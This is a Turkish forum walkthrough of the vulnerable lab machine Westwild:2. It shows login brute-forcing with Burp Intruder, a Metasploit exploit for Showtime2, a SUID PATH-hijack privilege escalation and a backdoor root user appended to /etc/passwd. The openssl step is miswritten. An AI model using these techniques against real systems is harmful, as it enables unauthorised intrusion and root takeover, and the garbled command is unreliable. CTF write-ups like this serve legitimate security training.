Merhabalar
Türk
Hack
Team ailesi, bugün sizlere "
Westwild: 2 zafiyetli makinesinin "çözümünü göstereceğim.
https://drive.google.com/file/d/1owI...z76OX6KsT/view
Makine İsmi: Westwild:2
Yapımcı: Hashim Alsharef
Seri: Westwild
Açıklama: Hedefte ki Flag'ı bulmak
Dosya Boyutu: 1.5 GB
İşletim Sistemi: Linux
Zorluk Derecesi: Orta
İlk olarak ağ taraması yapalım
Hedefimiz IP adresini bulduk gördüğünüz gibi.
NMAP taraması yaptığımızda ssh ve http portları açık olduğunu görüyoruz.
Siteye gittik ve normal bir site tasarımı olduğunu gördük. Tıklanak yerlere tıklayıp kaynak kodlarına baktım fakat bir şey bulamadım.
Daha sonra siteyi kazımak için
dirb aracını kullandım.
admin/aspadmin olduğunu gördüm şansımı denemek için oraya gittim.
Burada 2 adet dosya olduğunu gördüm. Bunlar şifre ve kullanıcı adı listesiydi.
Bunları çekmek için
Kod:
wget http://192.168.1.105/admin/aspadmin/user.list
wget http://192.168.1.105/admin/aspadmin/password.list
yazdım ve dosyaları indirdim. İçlerine baktığımda listeler olduğunu gördüm.
Daha sonra
admin/login.php olduğunu görmüştüm siteyi kazıdığımda. Oraya girdiğim de giriş ekranı geldiğini gördüm.
Burp ile siteye istek gönderdim.
Daha sonra sağ tık yapıp
Intruder'e yolladım.
Cluster Bomb'ı seçtim ve sağdan
Clear diyelim. Ardından kullanıcı adında ki
admin ve şifrede ki
admin kısımlarına sağdan
Add yapalım.
Payloads kısmına gelerek 1'e kullanıcı adlarını 2'ye de şifre listelerini ekliyelim.
Ardından tekrar
Positions kısmına gelerek sağda ki
Attack kısmına tıklayalım ve saldırı başlasın

Bir süre sonra kullanıcı adı ve şifreyi bulduk.
Ardından siteye tekrar giderek giriş yaptığımızda böyle bir admin paneli karşılıyor bizleri
Content kısmında
Showtime2'ye tıkladık.
İnternette biraz araştırma yaptıktan sonra exploiti olduğunu öğrendim.
msfconsole yazarak terminalde açalım.
Ardından
search showtime2 yazalım ve exploiti arayalım. Ayarlarını görmek için
yazalım.
Gerekli ayarları yapmak için
Kod:
set RHOSTS 192.168.1.8
set USERNAME west
set PASSWORD madison
yazalım ve
exploit yazarak exploit'i çalıştıralım. Ardından meterpreter de
shell yazalım.
Tam olarak giriş yapamadık yani izin vermedi. O yüzden python yardımıyla bunu düzelteceğiz. Tekrar konsola
Kod:
python3 -c 'import pty;pty.spawn("/bin/bash")'
yazalım.
Gördüğünüz gibi izni aldık
SUID iznine sahip dosyaları bulmak için
Kod:
find / -perm -u=s -type f 2>/dev/null
yazalım.
Bizlere
/usr/bin/network_info isimli bir dosya verdi bunu daha da açacağız.
ile tmp dizinine girelim. Ardından
Kod:
echo "/bin/bash" > ifconfig
yazalım. Bir komut yazdığımızda PATH değişkeni bizlere dönüt verir. Yetki yükseltmek için
ve
Kod:
export PATH=/tmp:$PATH
ardından west kullanıcısına gitmek için
Kod:
/usr/bin/network_info
yazalım ve
yazdık. Gördüğünüz gibi
wside isimli bir kullanıcı olduğunu göstermektedir.
LinEnum ile yetki yükseltmesi yapacağız. Bunun için
Kod:
git clone https://github.com/rebootuser/LinEnum/
yazalım ardından
Kod:
chmod 777 LinEnum.sh
yazarak yetkisini yükseltelim. Ardından çalıştırmak için
yazalım.
Burada root ile
passwd dizininde işlem yapılmış.
Burada biraz zorlandım açıkcası fakat sonra
openssl salt yöntemi ile çözümü buldum. Bu yöntem ile MD5 ile şifrelenmiş karma bir şifre verir bizlere. Terminale
Kod:
openssl salt -1 user pass123
yazalım ve kodu kopyalayalım.
Daha sonra makineye tekrar gelerek
Kod:
echo 'p4rstht:$1$user3$rAGRVf5p2jYTqt0W5cPu/:0:0::/root:/bin/bash' >> /etc/passwd
yazalım ve yetkiyi alalım. Ardından
yazalım ve şifreyi yazalım. İşlem başarılı!
FLAG'ı aldık (:
Konum bu kadardı arkadaşlar, bir sonraki konumda görüşmek üzere sağlıcakla...